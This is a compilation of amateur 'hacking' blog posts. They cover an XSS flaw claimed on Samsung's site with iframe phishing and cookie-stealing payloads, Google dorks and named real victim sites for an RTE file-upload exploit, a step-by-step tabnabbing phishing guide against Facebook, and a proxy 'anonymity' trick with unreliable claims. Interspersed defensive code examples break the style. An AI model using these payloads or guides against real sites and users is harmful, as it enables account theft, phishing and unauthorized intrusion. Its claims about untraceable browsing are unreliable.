change what we need!

XSS Found in Official web site of Samsung

Back in action after a long time, with a big boom. For the last 1 or 2 months I planned to post something here, but unfortunately I had no topic to post about... :P
I am a big fan of the Samsung Galaxy S3 and I want one, so as usual I opened Samsung's official web site and started to explore it.... but we are hackers: I found something when I searched on the web site, I forgot why I was there, and my devil.exe started.. lolzz
Forget all this, it's just "MASTI".
HERE WE GO...

WHAT IS XSS:



XSS (cross-site scripting) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Its effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

TYPES OF XSS :
  • Persistent XSS (PERMANENT)
  • Reflective XSS (TEMPORARY)

Impact of Cross-Site Scripting

  • Hijack an account
  • Spread Web worms
  • Access browser history and clipboard contents
  • Control the browser remotely
  • Scan and exploit intranet appliances and applications

Detecting an XSS Attack

<script>alert("UK")</script>
Use this script in the search box; if you get a pop-up alert box, it means there is an XSS vulnerability.

XSS Example:

mr.uk45 found an XSS vulnerability in Samsung's official web site.
Open this web site, go to the search box, type
<script>alert("UK")</script> and hit Enter.

 

 

 

 

 

 

now how you can misuse it :P

make your own phishing page 

use this script in search box

<iframe src="your phishing link" width="1000px" height="1000px" />

 

 

 

 

 

 

You can steal the cookie using

<script>alert(document.cookie)</script>

use your social engineering skill and hack the planet :)  

have a safe hacking :D :P
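
For site owners, the search-box reflection described in this post comes down to output that is not encoded. The following is an added example, not code from the original post or from Samsung's site: it puts a vulnerable search-results renderer beside a hardened one and adds response headers that limit injected scripts, injected iframes and cookie access. All function names and the page template are hypothetical.

```javascript
// Added example; all names here (escapeHtml, renderSearch*, securityHeaders) are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change meaning in HTML text or quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the search term is concatenated into the response as markup.
function renderSearchVulnerable(term) {
  return `<h1>Results for ${term}</h1>`;
}

// Hardened: the term is encoded for the HTML context it lands in.
function renderSearchSafe(term) {
  return `<h1>Results for ${escapeHtml(term)}</h1>`;
}

// Defence in depth: headers that limit what an injected payload could do.
function securityHeaders(sessionId) {
  return {
    // script-src 'self' blocks inline <script>; frame-src 'none' blocks injected <iframe>.
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'",
    // HttpOnly keeps the session cookie out of document.cookie.
    'Set-Cookie': `sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
    'X-Content-Type-Options': 'nosniff',
  };
}

// Constructed inputs: the two strings quoted in the post.
const PROBES = [
  '<script>alert("UK")</script>',
  '<iframe src="your phishing link" width="1000px" height="1000px" />',
];

function compare() {
  return PROBES.map((p) => ({
    vulnerable: renderSearchVulnerable(p),
    safe: renderSearchSafe(p),
  }));
}

console.log(compare());
console.log(securityHeaders('constructed-session-id'));
```

In the hardened output the browser shows the search term as text instead of parsing it as a tag.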




BEST WAY TO HIDE IP

Hi friends..
A new and trusted way to hide your IP.

Trust me.. after reading this you will say that we don't need to pay anything to surf anonymously.

Here we go...

Just go to anonymizer.com
and download or buy Anonymizer Universal.
You only have to pay $79.99 for it.
Finished, now you can surf anonymously... lolzz
I am just kidding.. we are hackers, we never pay.

Now it's time to start our devil mind's devil.exe.....
Step 1)
Just replace .com with .ru




The site converts to the Russian version...

Step 2)
Now at the top of the site you will find a box; just type the site you want to access..!

Here I am typing www.google.com






Why do we use a Russian web site?
Ans:
Most Russian web sites are free, so there is no need to pay anything.
More importantly, most Russian web sites are created by computer criminals because there is no IT act,
so only one criminal can understand another criminal's needs! :P


AND THE MORE INTERESTING THING IS THAT THEY HIDE THEIR LOGS...
SO TRUST ME, THERE IS NO WAY TO TRACK YOU BY YOUR IP ADDRESS... ENJOY HACKING
Note:
I recommend that you use https:// when you are browsing Facebook or any other social site!!











How to remove the Facebook virus (spam) posting a nude video link on your friends' walls


Oh god.. the last 25 days..!!
When my friends called me I got a smile on my face because I thought they all cared about me..
but actually they wanted to know how to remove this Facebook virus... haha :)
and they wanted my help.

So finally I decided to find out how to stop this virus.
After some googling, I found some useful tricks and tips
and finally decided to post that info on your favourite place, I mean my blog.. ;)
Let's start..

There is a virus on Facebook with a partially nude picture,
which gets posted in your name to all your friends if you click on it.
Obviously it spreads once you click on it, so avoid clicking on it in the first place.


 





If you are smart and you already clicked on it... (it means you are interested in watching this nude celebrity,
me too yaar, don't be shy.. :P) THEN DON'T WORRY.
That's the joke part, forget it.
Here are the steps to remove your favourite video..

So the solution to remove this Facebook virus is to remove / uninstall the extension. The extension is named YouTube Premium.
To remove this extension:

Google Chrome:
Go to Tools > Extensions and remove the extension youtube premium from there

Mozilla Firefox:
Go to Tools > Addons > Extensions and remove the addon “youtube premium”

Hopefully this will resolve the issue of the Facebook virus posting a nude video link on your friends' walls in your name!
And yes, next time think twice before clicking on such links.


How to hack web sites with Rte Remote file upload

Hi guys, after a long break I am back to work.
Here is one of the easiest methods to hack a web site.
In this tutorial I will tell you how to hack web sites with the Rte Remote file upload vulnerability.

» 1. use these google dorks :

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/


The Exploit is

site.com/rte/RTE_popup_file_atch.asp

site.com/admin/RTE_popup_file_atch.asp

For Example :
1)Site:- http://www.billkonigsberg.com
Vulnerability http://www.billkonigsberg.com/RTE_popup_file_atch.asp


2}Site:- http://www.jrf.org.tw
Vulnerability:http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp
Enjoy hacking...
Note: this information is for educational purposes only.. don't misuse it.


Download applications from store.ovi.com on your PC

Hello friends.... I am back with a new, more interesting trick... you can call it one type of hacking.
Now you are able to download applications from store.ovi.com on your PC.. no need to send them to your cell phone and then download...


What we need to get our job done..!!


Notepad++.. click on it and download it!

Start to bypass Ovi...!!

Step(1)
Go to store.ovi.com

and log in to your account

Step(2)

Open the application... which you want to download

Step(3)

Copy the path of this application

and paste it in the URL bar

It looks just like this...

Store.ovi.com/content/112595

After the number add /download

and hit the Enter button

After this you get a pop-up to download... the file

The extension of this file is .jad (Java Application Descriptor)

Step(4)

Download this file and open it with Notepad++

and find this text: "MIDlet-Jar-URL:". You will get something like this on the line:
https://d.ovi.com/p/g/store/3723888/ASBR_SMS_5233_EN_134_226006.jar?q=6FEDHgj3mstx0PDZvvjtYbzqIry9EKS*&c=ovi_store&eid=7c8557ff-1953-4a2a-91de-9190917870b6&productid=610099&sid=OviStore

Copy the URL to the URL bar on your browser, I mean this one:
https://d.ovi.com/p/g/store/3723888/ASBR_SMS_5233_EN_134_226006.jar?q=6FEDHgj3mstx0PDZvvjtYbzqIry9EKS*&c=ovi_store&eid=7c8557ff-1953-4a2a-91de-9190917870b6&productid=610099&sid=OviStore
Press Enter, you will get the *.jar file, and you can download the *.jad file



Step(5)

Symbian Installation Files (*.sis.dm or *.sisx.dm)
Remove the 3 lines of text; it will be something like this:
--boundary-1
Content-Type: x-epoc/x-sisx-app
Content-Transfer-Encoding: binary







Tabnabbing

Hello friends, I am back with a new and more interesting method called "TABNABBING".
It's a new version of "PHISHING"....
I will use "tabnabbing" as brought out by Aza Raskin.
If you are new to it you can follow my earlier post on tabnabbing. Keep in mind that you should know what "phishing" is and how it is done, so let's start....!!

Requirements:
(1) You should know how phishing is carried out; if not (read here)
(2) You should have a free hosting account (t35.com, 110mb.com)
(3) You need the two JavaScript codes for tabnabbing (download here)

Start Tabnabbing:
Facebook is one of the most used social networking sites, so.. we make a phishing page of Facebook

step 1> Make one phishing (fake) page of Facebook (if you don't know how to make it read here)

step2> Now use a standard web page like "www.gooogle.com"; save its source code in a
text file.
Save this page as "google.html"....

step3> Download the code, open "Bgaatack.js injecting Code.txt" and copy the content.

step4> Now open the step2 file (google.com) and find (alt + f) first
and put the copied content above it, then save
and upload the page to the free web hosting


step5> Now open "bgattack.js" and find (alt + f) "window.location=''" as
shown below and replace it with your fake page, then save and upload it



step6> Click on the standard web page, open a few tabs and see the change.
Now the process is complete.. :)

I have made a demo, you can check it here.
Open 2 or 3 more tabs, then come back to the main page........ what's happening!

Note:
This information is for educational purposes only,
so I request you guys, please don't misuse this
method.
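
From the detection side, the behaviour this post relies on is a page that changes its title, favicon or location while its tab is in the background and the user has not touched it. The following is an added example, not code from the original post or from the downloads it mentions: it scans a constructed timeline of tab events for that pattern. The event format and all names are hypothetical.

```javascript
// Added example; the event shape and all names (findTabnabSignals, TIMELINE) are hypothetical.
// Flags title, favicon or location changes that happen while the tab is hidden
// and were not triggered by a user gesture.
const WATCHED = new Set(['navigate', 'title', 'favicon']);

function findTabnabSignals(events) {
  let hidden = false;   // current visibility of the tab
  let origin = null;    // origin the user last saw in this tab
  const findings = [];
  for (const ev of events) {
    if (ev.type === 'visibility') { hidden = ev.state === 'hidden'; continue; }
    if (ev.type === 'load') { origin = new URL(ev.url).origin; continue; }
    if (!WATCHED.has(ev.type) || !hidden || ev.userGesture) continue;
    // A background navigation to another origin is the strongest signal.
    const crossOrigin = ev.type === 'navigate' && new URL(ev.url).origin !== origin;
    findings.push({ t: ev.t, type: ev.type, severity: crossOrigin ? 'high' : 'medium' });
    if (ev.type === 'navigate') origin = new URL(ev.url).origin;
  }
  return findings;
}

// Constructed timeline (seconds since page load); hosts are placeholders.
const TIMELINE = [
  { t: 0, type: 'load', url: 'https://news.example/article' },
  { t: 5, type: 'title', value: 'Article', userGesture: false },   // tab visible: ignored
  { t: 60, type: 'visibility', state: 'hidden' },
  { t: 65, type: 'favicon', value: 'https://login.example.invalid/favicon.ico', userGesture: false },
  { t: 65, type: 'title', value: 'Sign in', userGesture: false },
  { t: 66, type: 'navigate', url: 'https://login.example.invalid/', userGesture: false },
  { t: 120, type: 'visibility', state: 'visible' },
  { t: 130, type: 'navigate', url: 'https://news.example/next', userGesture: true },
];

console.log(findTabnabSignals(TIMELINE));
```

In a browser the hidden/visible state corresponds to document.visibilityState from the Page Visibility API.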




HOW TO HACK FACEBOOK PROFILE LAYOUT
Hey friends, last night I found an awesome trick to hack the Facebook profile look (layout)..

It's very funny.... and easy..!
Now I am going to hack a Facebook profile.....

step1>

  • First you need your jakkkash (good, handsome/beautiful) image
step2>

  • Open the http://www.piccut.com/ site

step3>
  • Now click on Browse and choose your photo (jakksah)... mind IT

...after choosing the image click on upload profile picture
step4>
  • After a minute the site automatically displays a demo of your image.. how it will look when you upload it to your Facebook profile
step5>
  • Download the ZIP file... extract the file

step6>
  • Now open your Facebook account
  • Make one album
  • Upload all your images
  • View snapshot and.. find the image named profile-pic.jpg in your photos
and upload it as your profile pic.

step7>

  • Now open your album and tag (tag yourself only) image5.jpg first,
then image4.jpg, and so on....
step8>

  • After this process refresh your Facebook profile and check out how it looks....



If you like my post then follow me....
